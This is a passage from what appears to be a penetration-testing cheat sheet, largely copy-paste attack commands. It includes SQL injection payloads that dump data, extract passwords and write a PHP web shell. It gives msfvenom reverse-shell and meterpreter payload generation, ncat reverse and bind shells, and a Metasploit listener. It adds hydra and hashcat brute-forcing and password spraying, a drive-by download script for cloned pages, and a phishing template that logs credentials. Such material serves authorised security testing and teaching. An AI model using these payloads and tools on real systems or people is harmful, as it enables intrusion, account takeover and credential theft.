-d Use post data
-H Use header
--hc/--hl/--hw/--hh Hide responses with the specified code/lines/words/chars
--sc/--sl/--sw/--sh Show responses with the specified code/lines/words/chars
--ss/--hs Show/hide responses with the specified regex within the content

Insecure Direct Object Reference (IDOR)

First, try to simply change one value to another, e.g. change [email protected] to [email protected], or e.g. change ID 1 to 2, etc.

It might be possible that ID 1 relates to some higher privilege account or role.

Second, try parameter pollution:

HTTP Response Splitting

Also known as CRLF injection. CRLF refers to carriage return (ASCII 13, \r) and line feed (ASCII 10, \n).

When encoded, \r refers to %0D and \n refers to %0A.

Fixate a session cookie:

somesite.com/redirect.asp?origin=somesite.com%0D%0ASet-Cookie:%20ASPSESSION=123456789

Open redirect:

somesite.com/home.php?marketing=winter%0D%0ALocation:%20https%3A%2F%2Fgithub.com

Session fixation and redirection are one of many techniques used in combination with HTTP response splitting. Search the Internet for more information.

Cross-Site Scripting (XSS)

Simple cross-site scripting (XSS) examples:

<script>alert(1)</script>

<script src="https://myserver.com/xss.js"></script>

<img src="https://github.com/favicon.ico" onload="alert(1)">

Hosting JavaScript on Pastebin doesn't work because Pastebin returns the plain text content-type.

Find out more about reflected and stored cross-site scripting (XSS) attacks, as well as cross-site request forgery (XSRF/CSRF) attacks from my other project.

Valid emails with embedded XSS:

user+(<script>alert(1)</script>)@somedomain.com

user@somedomain(<script>alert(1)</script>).com

"<script>alert(1)</script>"@somedomain.com

SQL Injection

The following examples were tested on MySQL database. Note that MySQL requires a white space between the comment symbol and the next character.

If you need to URL encode the white space, use either %20 or +.

Try to produce database errors by injecting a single-quote, back-slash, double-hyphen, forward-slash, or period.

Always make sure to properly close the surrounding code.

Read this article to learn how to bypass WAF.


Boolean-based SQLi:

' OR 1=1-- 

' OR 1=2-- 

Union-based SQLi:

' UNION SELECT 1,2,3,4-- 

' UNION SELECT NULL,NULL,NULL,NULL-- 

' UNION SELECT 1,concat_ws('|',database(),current_user(),version()),3,4-- 

' UNION SELECT 1,concat_ws('|',table_schema,table_name,column_name,data_type,character_maximum_length),3,4 FROM information_schema.columns-- 

' UNION SELECT 1,load_file('..\\..\\apache\\conf\\httpd.conf'),3,4-- 

If using e.g. 1,2,3,4 does not work, try using NULL,NULL,NULL,NULL respectively.

Use the union-based SQLi only when you are able to use the same communication channel to both launch the attack and gather results.

The goal is to determine the exact number of columns in the application query and to figure out which of them are displaying to the user.

Another way to determine the exact number of columns is by using e.g. ' ORDER BY 1-- , where 1 is the column number used for sorting - try incrementing it by one.


Time-based SQLi:

' AND (SELECT 1 FROM (SELECT sleep(2)) test)-- 

' AND (SELECT 1 FROM (SELECT CASE user() WHEN '[email protected]' THEN sleep(2) ELSE sleep(0) END) test)-- 

' AND (SELECT 1 FROM (SELECT CASE substring(current_user(),1,1) WHEN 'r' THEN sleep(2) ELSE sleep(0) END) test)-- 

' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN sleep(2) ELSE sleep(0) END FROM users WHERE id = 1)-- 

' AND IF(version() LIKE '5%',sleep(2),sleep(0))-- 

Use the time-based SQLi when you are not able to see the results.


Check for the existance/correctness:

' AND (SELECT 'exists' FROM users) = 'exists

' AND (SELECT 'exists' FROM users WHERE username = 'administrator') = 'exists

' AND (SELECT 'correct' FROM users WHERE username = 'administrator' AND length(password) < 8 ) = 'correct

' AND (SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE 'correct' END FROM users WHERE username = 'administrator') = 'correct

'||(SELECT CASE substring(password,1,1) WHEN '$' THEN to_char(1/0) ELSE '' END FROM users WHERE username = 'administrator')||'

Inject a simple PHP web shell based on HTTP GET request:

' UNION SELECT '', '', '', '<?php if(isset($_GET["command"])){echo shell_exec($_GET["command"]);} ?>' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'-- 

' UNION SELECT '', '', '', '<?php $p="command";$o=null;if(isset($_SERVER["REQUEST_METHOD"])&&strtolower($_SERVER["REQUEST_METHOD"])==="get"&&isset($_GET[$p])&&($_GET[$p]=trim($_GET[$p]))&&strlen($_GET[$p])>0){$o=@shell_exec("($_GET[$p]) 2>&1");if($o===false){$o="ERROR: The function might be disabled.";}else{$o=str_replace("<","&lt;",$o);$o=str_replace(">","&gt;",$o);}} ?><!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Simple PHP Web Shell</title><meta name="author" content="Ivan Šincek"><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><pre><?php echo $o;unset($o);unset($_GET[$p]); ?></pre></body></html>' INTO DUMPFILE '..\\..\\htdocs\\backdoor.php'-- 

To successfully inject a web shell, the current database user must have a write permission.

sqlmap

Inject SQL code into request parameters:

sqlmap -a -u somesite.com/index.php?username=test&password=test

sqlmap -a -u somesite.com/index.php --data username=test&password=test

sqlmap -a -u somesite.com/index.php --data username=test&password=test -p password
Option Description
-u Target URL
-H Extra HTTP header
--data Data string to be sent through POST
--cookie HTTP Cookie header value
--proxy Use a proxy to connect to the target URL ([protocol://]host[:port])
-p Testable parameter(s)
--level Level of tests to perform (1-5, default: 1)
--risk Risk of tests to perform (1-3, default: 1)
-a Retrieve everything
-b Retrieve DBMS banner
--dump-all Dump all DBMS databases tables entries
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter, or VNC
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard Simple wizard interface for beginner users
--dbms To do.

dotdotpwn

Traverse a path (e.g. somesite.com/../../../etc/passwd):

dotdotpwn -q -m http -S -o windows -f /windows/win.ini -k mci -h somesite.com

dotdotpwn -q -m http -o unix -f /etc/passwd -k root -h somesite.com

dotdotpwn -q -m http-url -o unix -f /etc/hosts -k localhost -u 'https://somesite.com/index.php?file=TRAVERSAL'

Try to prepend a protocol such as file://, gopher://, dict://, php://, jar://, ftp://, tftp://, etc. to the file path; e.g file://TRAVERSAL.

Check some additional directory traversal tips at swisskyrepo/PayloadsAllTheThings. Credits to the author!

Option Description
-m Module (http, http-url, ftp, tftp payload, stdout)
-h Hostname
-O Operating System detection for intelligent fuzzing (nmap)
-o Operating System type if known ("windows", "unix", or "generic")
-d Depth of traversals (default: 6)
-f Specific filename (default: according to OS detected)
-S Use SSL for HTTP and Payload module (not needed for http-url)
-u URL with the part to be fuzzed marked as TRAVERSAL
-k Text pattern to match in the response
-p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
-x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
-U Username (default: 'anonymous')
-P Password (default: 'dot(at)dot.pwn')
-M HTTP Method to use when using the 'http' module (GET, POST, HEAD, COPY, MOVE, default: GET)
-b Break after the first vulnerability is found
-C Continue if no data was received from host

Web Shells

Find out more about PHP shells from my other project.

Find out more about Java/JSP shells from my other project.

Send a Payload With Python

Find out how to generate a reverse shell payload for Python and send it to a target's machine from my other project.

4. Post Exploitation

4.1 Useful Websites

Generate a Reverse Shell Payload for Windows OS

To generate a Base64 encoded payload, use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff | base64 -w 0 > payload.txt

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff | base64 -w 0 > payload.txt

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 > payload.txt

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw | base64 -w 0 > payload.txt

To generate a binary file, use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff -o payload.bin

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -b \x00\x0a\x0d\xff -o payload.bin

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f raw -o payload.bin

To generate a DLL file, use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f dll -b \x00\x0a\x0d\xff -o payload.dll

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f dll -b \x00\x0a\x0d\xff -o payload.dll

To generate a standalone executable, file use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -b \x00\x0a\x0d\xff -o payload.exe

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -b \x00\x0a\x0d\xff -o payload.exe

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f exe -o payload.exe

To generate an MSI file, use one of the following MSFvenom commands (modify them to your need):

msfvenom --platform windows -a x86 -e x86/call4_dword_xor -p windows/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f msi -b \x00\x0a\x0d\xff -o payload.msi

msfvenom --platform windows -a x64 -e x64/xor -p windows/x64/shell_reverse_tcp LHOST=192.168.8.5 LPORT=9000 EXITFUNC=thread -f msi -b \x00\x0a\x0d\xff -o payload.msi

Bytecode might not work on the first try due to some other bad characters. Trial and error is the key.

So far there is no easy way to generate a DLL nor MSI file with a stageless meterpreter shell due to the size issues.

PowerShell Encoded Command

To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))

To run the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand $command

To decode a PowerShell encoded command, run the following PowerShell command:

[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))

Find out more about PowerShell reverse and bind TCP shells from my other project.

5. Password Cracking

Google a hash before trying to crack it because you might save yourself a lot of time and trouble.

Use Google Dorks, Chad, or FOCA to find files and within file's metadata domain usernames to brute force.

Keep in mind that you might lockout people's accounts.

Keep in mind that some web forms implement CAPTCHA and/or hidden submission tokens which may prevent you from brute forcing. Try to submit requests without tokens or CAPTCHA.

You can find a bunch of wordlists in SecLists.

5.1 Useful Websites

crunch

Generate a lower-alpha-numeric wordlist:

crunch 4 6 -f /usr/share/crunch/charset.lst lalpha-numeric -o crunch_wordlist.txt

See the list of all available charsets or add your own in charset.lst located at /usr/share/crunch/ directory.

Generate all the possible permutations from words:

crunch -o crunch_wordlist.txt -p admin 123 \!\"

crunch -o crunch_wordlist.txt -q words.txt

Generate all the possible combinations from a charset:

crunch 4 6 -o crunch_wordlist.txt -p admin123\!\"
Option Description
-d Limits the number of consecutive characters
-f Specifies a character set from a file
-i Inverts the output
-l When you use the -t option this option tells crunch which symbols should be treated as literals
-o Specifies the file to write the output to
-p Tells crunch to generate/permute words that don't have repeating characters
-q Tells crunch to read a file and permute what is read
-r Tells crunch to resume generate words from where it left off, -r only works if you use -o
-s Specifies a starting string
-t Specifies a pattern
Placeholder Description
@ Lower case characters
, Upper case characters
% Numbers
^ Symbols

Unfortunately, there is no placeholder ranging from lowercase-alpha to symbols.

Generate all the possible combinations from a placeholder:

crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^

crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ -d 2% -d 1^

crunch 10 10 + + 123456 \!\" -o crunch_wordlist.txt -t admin@@%^^

crunch 10 10 -o crunch_wordlist.txt -t @dmin@@%^^ -l @aaaaaaaaa

hash-identifier

To identify a hash type, run the following tool:

hash-identifier

Hashcat

Brute force MD5 hashes:

hashcat -m 0 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt

Brute force NetNTLMv1 hashes:

hashcat -m 5500 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt

Use --session=<session_name> to save, and continue your cracking progress later using --restore.

Continue cracking progress:

hashcat --session=cracking --restore
Option Description
-m Hash-type, see references below
-a Attack-mode, see references below
--force Ignore warnings
--runtime Abort session after X seconds of runtime
--status Enable automatic update of the status screen
-o Define outfile for recovered hash
--show Show cracked passwords found in potfile
--session Define specific session name
--restore Restore session from --session
--restore-file-path Specific path to restore file
-O Enable optimized kernels (limits password length)
-1 User-defined charset ?1
-2 User-defined charset ?2
-3 User-defined charset ?3
-4 User-defined charset ?4

When specifying a user-defined charset, escape ? with another ? (i.e. use ?? instead of \?).

Hash Type Description
0 MD5
100 SHA1
1400 SHA256
1700 SHA512
200 MySQL323
300 MySQL4.1/MySQL5
1000 NTLM
5500 NetNTLMv1-VANILLA / NetNTLMv1-ESS
5600 NetNTLMv2
2500 WPA/WPA2
16800 WPA-PMKID-PBKDF2
16500 JWT (JSON Web Token)

For more hash types read the manual.

Attack Mode Name
0 Straight
1 Combination
3 Brute Force
6 Hybrid Wordlist + Mask
7 Hybrid Mask + Wordlist
9 Association
Charset Description
?l abcdefghijklmnopqrstuvwxyz
?u ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d 0123456789
?s !"#$%&'()*+,-./:;<=>?@[]^_`{|}~
?a ?l?u?d?s
?b 0x00 - 0xff

Dictionary attack:

hashcat -m 100 -a 0 --session=cracking --force --status -O B1B3773A05C0ED0176787A4F1574FF0075F7521E rockyou.txt

hashcat -m 5600 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt

You can find rockyou.txt wordlist in SecLists.

Brute force a hash using a placeholder:

hashcat -m 0 -a 3 --session=cracking --force --status -O cc158fa2f16206c8bd2c750002536211 -1 ?l?u -2 ?d?s ?1?l?l?l?l?l?2?2

hashcat -m 0 -a 3 --session=cracking --force --status -O 85fb9a30572c42b19f36d215722e1780 -1 \!\"\#\$\%\&\/\(\)\=??\* -2 ?d?1 ?u?l?l?l?l?2?2?2

Cracking the JWT

Dictionary attack:

hashcat -m 16500 -a 3 --session=cracking --force --status -O eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds

You can also check the JWT cracking tool from my other project.

Hydra

Crack an HTTP POST web form login:

hydra -o hydra_results.txt -l admin -P rockyou.txt somesite.com http-post-form '/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed!'

When cracking a web form login, you must specify Login=Login:<expected_message> to distinguish between a successful login and a failed one. Each expected message can vary between web forms.

Keep in mind that the username and password request parameters can be named differently.

Crack a Secure Shell (SSH) login:

hydra -o hydra_results.txt -L users.txt -P rockyou.txt 192.168.8.5 ssh

You can find a bunch of wordlists in SecLists.

Option Description
-R Restore a previous aborted/crashed session
-S Perform an SSL connect
-O Use old SSL v2 and v3
-s If the service is on a different default port, define it here
-l Login with a login name
-L Load several logins from a file
-p Login with a password
-P Load several passwords from a file
-x Password brute force generation (MIN:MAX:CHARSET), type "-x -h" to get help
-y Disable use of symbols in bruteforce
-e Try "n" null password, "s" login as pass and/or "r" reversed login
-o Write found login/password pairs to a file instead of stdout
-f/-F Exit when a login/pass pair is found (-f per host, -F global)
-M List of servers to attack, one entry per line, ':' to specify port
Supported Services
ftp[s]
http[s]-{get|post}-form
mysql
smb
smtp[s]
snmp
ssh
telnet[s]
vnc

For more supported services read the manual.

Brute Force Syntax Description
MIN Minimum number of characters in the password
MAX Maximum number of characters in the password
CHARSET Charset values are: "a" for lowercase letters, "A" for uppercase letters, "1" for numbers, and for all others, just add their real representation

Brute force attack:

hydra -o hydra_results.txt -l admin -x 4:4:aA1\!\"\#\$\% 192.168.8.5 ftp

Password Spraying

After you have collected enough usernames from reconnaissance phase, it is time to try and crack some of them.

Find out how to generate a good password spraying wordlist from my other project, but first you will need a few good keywords that describe your target.

Such keywords can be a company name, abbreviations, words that describe your target's services, products, etc.

After you generate the wordlist, use it with tools such as Hydra, Burp Suite Intruder, etc. to crack web login forms. P.S. Hydra can attack authentication mechanisms on all kinds of services/ports.

If strong password policy is enforced, passwords usually start with one capitalized word followed by a few digits and one special character at the end (e.g. Password123!).

You can also use the generated wordlist with hashcat, e.g. to crack NTLMv2 hashes that you have collected using LLMNR responder, etc.

6. Social Engineering

Find out how to embed a PowerShell script into an MS Word document from my other project.

Drive-by Download

To force users to download a malicious file, copy and paste this JavaScript code block on a cloned web page:

function download(url, type, name, method) {
	var req = new XMLHttpRequest();
	req.open(method, url, true);
	req.responseType = 'blob';
	req.onload = function() {
		var blob = new Blob([req.response], { type: type })
		var isIE = false || !!document.documentMode;
		if (isIE) {
			// IE doesn't allow using a blob object directly as link
			// instead it is necessary to use msSaveOrOpenBlob()
			if (window.navigator && window.navigator.msSaveOrOpenBlob) {
				window.navigator.msSaveOrOpenBlob(blob, name);
			}
		} else {
			var anchor = document.createElement('a');
			anchor.href = window.URL.createObjectURL(blob);
			anchor.download = name;
			anchor.click();
			// in Firefox it is necessary to delay revoking the ObjectURL
			setTimeout(function() {
				window.URL.revokeObjectURL(anchor);
				anchor.remove();
			}, 250);
		}
	};
	req.send();
}
// specify your file here, use only an absolute URL
download('http://localhost/files/pentest.pdf', 'application/pdf', 'pentest.pdf', 'GET');
// download('http://localhost/files/pentest.docx', 'plain/txt', 'pentest.docx', 'GET');

To try it out, copy all the content from \social_engineering\driveby_download\ to your server's web root directory (e.g. to \xampp\htdocs\ on XAMPP), and navigate to the web page with your preferred web browser.

Phishing Website

To try it out, copy all the content from \social_engineering\phishing_website\ to your server's web root directory (e.g. to \xampp\htdocs\ on XAMPP), and navigate to the web page with your preferred web browser.

Captured credentials will be stored in \social_engineering\phishing_website\logs\credentials.log.

Phishing Website

Figure 2 - Phishing Website


Read the comments in \social_engineering\phishing_website\index.php to get a better understanding on how all of it works.

You can modify and expand this template to your liking. You have everything that needs to get you started.

You can easily customize CSS to make it look more like the company you are testing, e.g. change colors, logo, etc.

Check the standalone redirect templates in \social_engineering\phishing_website\redirects\ directory.


Use SingleFile (Chrome)(FireFox) browser extension to download a web page as a single HTML file, then, rename the file to index.php.

7. Miscellaneous

Here you can find a bunch of random stuff.

7.1 Useful Websites

cURL

Download a file:

curl somesite.com/somefile.txt -o somefile.txt

Upload a file:

curl somesite.com/uploads/ -T somefile.txt

Find out how to test a web server for various HTTP methods and method overrides from my other project.

Option Description
-d Sends the specified data in a POST request to the HTTP server
-H Extra header to include in the request when sending HTTP to a server
-i Include the HTTP response headers in the output
-k Proceed and operate server connections otherwise considered insecure
-o Write to file instead of stdout
-T Transfers the specified local file to the remote URL, same as PUT method
-v Make the operation more talkative
-x Use the specified proxy ([protocol://]host[:port])
-X Specifies a custom request method to use when communicating with the HTTP server

Ncat

[Server] Set up a listener:

ncat -nvlp 9000

ncat -nvlp 9000 > received_data.txt

ncat -nvlp 9000 -e /bin/bash

ncat -nvlp 9000 -e /bin/bash --ssl

ncat -nvlp 9000 --ssl-cert crt.pem --ssl-key key.pem

ncat -nvlp 9000 --keep-open <<< "HTTP/1.1 200 OK\r\n\r\n"

[Client] Connect to a remote host:

ncat -nv 192.168.8.5 9000

ncat -nv 192.168.8.5 9000 < sent_data.txt

ncat -nv 192.168.8.5 9000 -e /bin/bash

ncat -nv 192.168.8.5 9000 -e /bin/bash --ssl

ncat -nv 192.168.8.5 9000 --ssl-cert crt.pem --ssl-key key.pem

Check if connection to a specified TCP port (e.g. port 22 or 23) is possible:

for i in {0..255}; do ncat -nv "192.168.8.${i}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done

for ip in $(cat ips.txt); do ncat -nv "${ip}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done

Find out how to create an SSL/TLS certificate from my other project.

multi/handler

Set up a listener (change the PAYLOAD, LHOST, and LPORT as necessary):

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

ngrok

Use ngrok to give your local web server a public address, but do not expose the web server for too long if it is not properly hardened due to security concerns.

I advise you not to transfer any sensitive data over it, just in case.

Additional References

Credits to the authors!

OPEN ISSUES

See all

RELEASES

See all